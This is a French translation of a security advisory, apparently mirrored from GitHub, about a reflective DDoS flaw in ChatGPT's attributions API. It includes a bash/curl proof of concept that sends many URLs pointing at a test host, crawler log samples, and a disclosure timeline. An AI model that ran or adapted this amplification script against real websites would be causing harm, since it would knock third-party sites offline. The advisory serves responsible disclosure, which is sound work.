Problème 4541

Loading...
security-advisories/2025-01-ChatGPT-Crawler-Reflective-DDOS-Vulnerability.md sur main · bf/security-advisories
github.com · 2025

Gravité : [Élevée - score CVSS de 8,6](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H/E:H/RL:U/RC:C/CR:L/IR:L/AR:H/MAV:N/MAC:L/MPR:N/MUI:N/MS:C/MC:N/MI:N/MA:H%5D(https://chandanbn.github.io/cvss/#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H) car il est basé sur le réseau, de faible complexité, aucun privilège requis, aucune interaction utilisateur requise, portée modifiée, aucun impact sur la confidentialité ou l'intégrité mais impact élevé sur Disponibilité.

Le robot ChatGPT peut être déclenché pour attaquer par DDoS un site Web victime via une requête HTTP vers une API ChatGPT non liée. Ce défaut dans le logiciel OpenAI engendrera une attaque DDoS sur un site Web victime sans méfiance, en utilisant plusieurs plages d'adresses IP Microsoft Azure sur lesquelles le robot ChatGPT s'exécute.

L'API ChatGPT présente un grave défaut de qualité lors du traitement des requêtes HTTP POST vers https://chatgpt.com/backend-api/attributions. L'API attend une liste d'hyperliens dans le paramètre urls. Il est bien connu que les hyperliens vers le même site Web peuvent être écrits de différentes manières. En raison de mauvaises pratiques de programmation, OpenAI ne vérifie pas si un hyperlien vers la même ressource apparaît plusieurs fois dans la liste. OpenAI n'impose pas non plus de limite au nombre maximal d'hyperliens stockés dans le paramètre urls, permettant ainsi la transmission de plusieurs milliers d'hyperliens dans une seule requête HTTP.

Immédiatement après la réception d'une requête HTTP POST bien formée par le point de terminaison API https://chatgpt.com/backend-api/attributions d'OpenAI, OpenAI lancera une requête HTTP pour chaque lien hypertexte contenu dans le paramètre urls à partir des serveurs OpenAI situés dans le cloud Microsoft Azure. À ce stade, un site Web victime subira un nombre élevé de tentatives de connexion parallèles et de requêtes HTTP de la part des serveurs d'OpenAI. Même si OpenAI est conscient qu'il envoie un grand nombre de requêtes au même site Web au même moment, il ne fait aucune tentative pour limiter le nombre de connexions au même site Web ou même empêcher l'émission de requêtes en double à la même ressource.

En fonction du nombre de liens hypertexte transmis à OpenAI via le paramètre urls, le grand nombre de connexions à partir des serveurs d'OpenAI peut submerger le site Web victime.

Ce défaut logiciel fournit un facteur d'amplification significatif pour les attaques DDoS potentielles. OpenAI présente un manque de processus de contrôle qualité dans son ingénierie logicielle et devrait remédier à ce défaut dès que possible.

Ce code de preuve de concept met en évidence les défauts de l'API d'OpenAI en initiant l'envoi de 50 requêtes HTTP depuis les serveurs OpenAI vers my-website.localhost.

#!/bin/bash echo {1..50} | tr ' ' '\n' | ( while read -r i; do echo "https://my-website.localhost:$RANDOM/$i-$RANDOM.txt"; done ) | jq -R -s -j -c '{ "urls": split("\n")[:-1] }' \ | curl -v --http1.1 \ -H 'user-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.32 (KHTML, comme Gecko) Chrome/133.0.0.1 Safari/535.32' \ -H "content-type: application/jason" \ -H 'origin: https://www.chatgpt.com' \ --data-binary @- -X POST 'https:///chatgpt.com/backend-api/attributions'

Les fichiers journaux sur le serveur Web my-website.localhost afficheront de nombreuses tentatives de connexion par ChatGPT Crawler se produisant dans la même seconde :

... 2025-01-10 40.84.221.211 "GET /9185 HTTP/2.0" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, comme Gecko) ; compatible ; ChatGPT-User/1.0 ; +https://openai.com/bot" 2025-01-10 40.84.221.210 "GET /1190 HTTP/2.0" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, comme Gecko) ; compatible ; ChatGPT-User/1.0 ; +https://openai.com/bot" 2025-01-10 40.84.221.208 "GET /9185 HTTP/2.0" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, comme Gecko) ; compatible ; ChatGPT-User/1.0 ; +https://openai.com/bot" 2025-01-10 40.84.221.208 "GET /1190 HTTP/2.0" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, comme Gecko); compatible; ChatGPT-User/1.0; +https://openai.com/bot" ...

Ce défaut logiciel a été découvert en janvier 2025 et divulgué de manière responsable à OpenAI en tant que propriétaire du logiciel défectueux et à Microsoft en tant que propriétaire des serveurs qui génèrent le nombre massif de requêtes Web potentiellement malveillantes.

Malheureusement, il n'a pas été possible d'obtenir une réaction de l'une ou l'autre des parties en temps voulu, même si de nombreuses tentatives ont été faites pour assurer une atténuation de ce défaut logiciel, notamment :

  • en contactant l'équipe de sécurité d'OpenAI via un rapport sur leur plateforme de signalement de vulnérabilités BugCrowd (aucune réponse d'OpenAI)
  • en contactant l'équipe de sécurité d'OpenAI par e-mail à disclosure@openai.com comme décrit dans le fichier .well-known/security.txt sur leur serveur Web (message « la boîte aux lettres n'est plus utilisée », aucune réponse d'OpenAI)
  • en contactant les employés d'OpenAI via des rapports et des avis de sécurité publiés sur leurs dépôts github (aucune réponse d'OpenAI)
  • en contactant le responsable de la confidentialité des données d'OpenAI par e-mail à privacy@openai.com et dsar@openai.com (réponse par e-mail rédigée par l'IA pointant vers le site Web de la FAQ)
  • contact du personnel de support d'OpenAI par e-mail à support@openai.com (réponse par e-mail rédigée par l'IA pointant vers le site Web de la FAQ)
  • contact de l'équipe de sécurité Microsoft par e-mail à secure@microsoft.com, abuse@microsoft.com, et bien d'autres (aucune réponse de Microsoft)
  • contact de l'équipe de sécurité Microsoft via des formulaires remplis sur cert.microsoft.com (réponse par e-mail rédigée par l'IA : « dossier clos »)
  • contact de l'équipe des opérations réseau Microsoft Azure par e-mail aux contacts fournis dans les enregistrements WHOIS (aucune réponse de Microsoft)
  • contact de l'équipe de sécurité de CloudFlare via un rapport sur HackerOne, car CloudFlare fournit le serveur de passerelle à https://chatgpt.com (le personnel de HackerOne ferme le rapport comme « informatif », refuse de transmettre les informations à CloudFlare)

En date du vendredi 10 janvier 2025, après divers rapports sur des questions juridiques canaux de communication, ce défaut logiciel n'est ni résolu par OpenAI/Microsoft ni reconnu son existence.

Lire la source